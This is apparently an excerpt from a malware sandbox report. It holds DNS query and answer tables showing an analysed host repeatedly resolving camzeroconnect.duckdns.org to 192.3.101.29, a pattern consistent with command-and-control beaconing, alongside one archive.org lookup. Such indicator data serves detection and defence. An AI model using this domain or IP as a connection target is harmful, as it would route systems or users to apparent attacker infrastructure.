                                                                                            Sep 27, 2024 14:03:30.908582926 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.915776968 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.922401905 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.929476976 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.943100929 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.950442076 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.957448959 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.964853048 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:31.971231937 CEST192.168.2.228.8.8.80xb830Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.988152027 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:32.999370098 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.013245106 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.028222084 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:33.063311100 CEST192.168.2.228.8.8.80x5aafStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.098870039 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.105849981 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:34.112404108 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.118577003 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:36.135509014 CEST192.168.2.228.8.8.80xf944Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.162839890 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.171395063 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.183876991 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.203316927 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:37.215513945 CEST192.168.2.228.8.8.80x9ecfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:40.369716883 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:40.483668089 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.484903097 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.595396996 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:41.616406918 CEST192.168.2.228.8.8.80xf2ffStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.663310051 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.672385931 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.681231022 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.689261913 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:42.701257944 CEST192.168.2.228.8.8.80x5f1dStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.722898960 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.730235100 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.737288952 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.744151115 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:43.752209902 CEST192.168.2.228.8.8.80x5399Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.765592098 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.773000002 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:44.780136108 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.023869038 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:45.031570911 CEST192.168.2.228.8.8.80x1137Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:50.057538033 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:51.063288927 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:52.077292919 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:53.160895109 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:55.311191082 CEST192.168.2.228.8.8.80x4da7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.356981993 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.364865065 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.373145103 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.380249977 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:56.387121916 CEST192.168.2.228.8.8.80x1e4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:57.413065910 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.426529884 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.520391941 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.529246092 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:58.536519051 CEST192.168.2.228.8.8.80x1f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.566481113 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.575681925 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.582640886 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.589510918 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:03.590403080 CEST192.168.2.228.8.8.80xde5Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.612298012 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.712228060 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.725301027 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.737396955 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.749265909 CEST192.168.2.228.8.8.80x2ffbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.765167952 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.777570009 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.788455963 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.797410965 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.805464029 CEST192.168.2.228.8.8.80x80c9Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.832499981 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.841325045 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.849286079 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.857372999 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.869282961 CEST192.168.2.228.8.8.80x521aStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.899297953 CEST192.168.2.228.8.8.80xca60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.906862974 CEST192.168.2.228.8.8.80xca60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.914143085 CEST192.168.2.228.8.8.80xca60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.920691967 CEST192.168.2.228.8.8.80xca60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.927462101 CEST192.168.2.228.8.8.80xca60Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.068567038 CEST192.168.2.228.8.8.80x503Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.078195095 CEST192.168.2.228.8.8.80x503Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.085299969 CEST192.168.2.228.8.8.80x503Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.092714071 CEST192.168.2.228.8.8.80x503Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.100603104 CEST192.168.2.228.8.8.80x503Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.114912987 CEST192.168.2.228.8.8.80xc35fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.121584892 CEST192.168.2.228.8.8.80xc35fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.128781080 CEST192.168.2.228.8.8.80xc35fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.136715889 CEST192.168.2.228.8.8.80xc35fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.144227028 CEST192.168.2.228.8.8.80xc35fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.176871061 CEST192.168.2.228.8.8.80x19Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.184524059 CEST192.168.2.228.8.8.80x19Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.192275047 CEST192.168.2.228.8.8.80x19Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.200655937 CEST192.168.2.228.8.8.80x19Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.210244894 CEST192.168.2.228.8.8.80x19Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.678575993 CEST192.168.2.228.8.8.80x3c71Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.687630892 CEST192.168.2.228.8.8.80x3c71Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.696523905 CEST192.168.2.228.8.8.80x3c71Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.703808069 CEST192.168.2.228.8.8.80x3c71Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.711025000 CEST192.168.2.228.8.8.80x3c71Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.129681110 CEST192.168.2.228.8.8.80xff25Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.137011051 CEST192.168.2.228.8.8.80xff25Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.145030022 CEST192.168.2.228.8.8.80xff25Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.163609028 CEST192.168.2.228.8.8.80xff25Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:18.977000952 CEST192.168.2.228.8.8.80x42e1Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:18.995959044 CEST192.168.2.228.8.8.80x42e1Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:20.001362085 CEST192.168.2.228.8.8.80x42e1Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:22.013757944 CEST192.168.2.228.8.8.80x42e1Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Sep 27, 2024 14:00:15.825017929 CEST8.8.8.8192.168.2.220x5835No error (0)ia601706.us.archive.org207.241.227.96A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:23.049609900 CEST8.8.8.8192.168.2.220xc39bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:23.091841936 CEST8.8.8.8192.168.2.220xc39bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:26.835711002 CEST8.8.8.8192.168.2.220xc39bNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:30.616420031 CEST8.8.8.8192.168.2.220xdfb9Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:31.494175911 CEST8.8.8.8192.168.2.220xdfb9Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:32.505213976 CEST8.8.8.8192.168.2.220xdfb9Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:35.160998106 CEST8.8.8.8192.168.2.220x460No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:35.615067959 CEST8.8.8.8192.168.2.220xdfb9Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:35.749037981 CEST8.8.8.8192.168.2.220x460No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:36.906002045 CEST8.8.8.8192.168.2.220x460Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:42.142952919 CEST8.8.8.8192.168.2.220x926eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:42.937685966 CEST8.8.8.8192.168.2.220x926eServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:44.558604956 CEST8.8.8.8192.168.2.220x85faNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:44.954437971 CEST8.8.8.8192.168.2.220x926eServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:47.464903116 CEST8.8.8.8192.168.2.220x926eServer failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:47.473181963 CEST8.8.8.8192.168.2.220x11f4No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:49.943022013 CEST8.8.8.8192.168.2.220x280eNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:53.494307041 CEST8.8.8.8192.168.2.220x3456No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:55.931344032 CEST8.8.8.8192.168.2.220xf11cNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:57.393984079 CEST8.8.8.8192.168.2.220x3456Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:00:58.387974977 CEST8.8.8.8192.168.2.220x2fa0No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:00.829336882 CEST8.8.8.8192.168.2.220xe40dNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:03.294471979 CEST8.8.8.8192.168.2.220x1010No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:05.752479076 CEST8.8.8.8192.168.2.220x7ef8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:08.301836967 CEST8.8.8.8192.168.2.220x2219No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:10.719921112 CEST8.8.8.8192.168.2.220x6f6No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:13.329231024 CEST8.8.8.8192.168.2.220xf3eaNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:15.837271929 CEST8.8.8.8192.168.2.220x4333No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:18.356394053 CEST8.8.8.8192.168.2.220x1056No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:23.923219919 CEST8.8.8.8192.168.2.220x1697No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:24.917315006 CEST8.8.8.8192.168.2.220x1697No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:24.934381962 CEST8.8.8.8192.168.2.220x1697No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:25.803556919 CEST8.8.8.8192.168.2.220x1697Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.028297901 CEST8.8.8.8192.168.2.220x498aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.035914898 CEST8.8.8.8192.168.2.220x498aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.043209076 CEST8.8.8.8192.168.2.220x498aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.050077915 CEST8.8.8.8192.168.2.220x498aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:26.058279037 CEST8.8.8.8192.168.2.220x498aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.364629030 CEST8.8.8.8192.168.2.220x7aadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.372545004 CEST8.8.8.8192.168.2.220x7aadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.379765034 CEST8.8.8.8192.168.2.220x7aadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.387445927 CEST8.8.8.8192.168.2.220x7aadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:27.394988060 CEST8.8.8.8192.168.2.220x7aadNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.599086046 CEST8.8.8.8192.168.2.220xb1f6No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:28.930603981 CEST8.8.8.8192.168.2.220x1697Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:29.609155893 CEST8.8.8.8192.168.2.220xb1f6No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:30.697485924 CEST8.8.8.8192.168.2.220xb1f6No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:30.709381104 CEST8.8.8.8192.168.2.220xb1f6No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.740211964 CEST8.8.8.8192.168.2.220x4c24No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.746661901 CEST8.8.8.8192.168.2.220x4c24No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:31.753889084 CEST8.8.8.8192.168.2.220x4c24No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:34.615731955 CEST8.8.8.8192.168.2.220xb1f6Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:35.875736952 CEST8.8.8.8192.168.2.220x4c24No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.760782957 CEST8.8.8.8192.168.2.220x4c24Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.900362968 CEST8.8.8.8192.168.2.220xfad8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.912358046 CEST8.8.8.8192.168.2.220xfad8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.924940109 CEST8.8.8.8192.168.2.220xfad8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.942045927 CEST8.8.8.8192.168.2.220xfad8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:36.949496031 CEST8.8.8.8192.168.2.220xfad8No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.976424932 CEST8.8.8.8192.168.2.220x37f7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:01:37.988940954 CEST8.8.8.8192.168.2.220x37f7No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
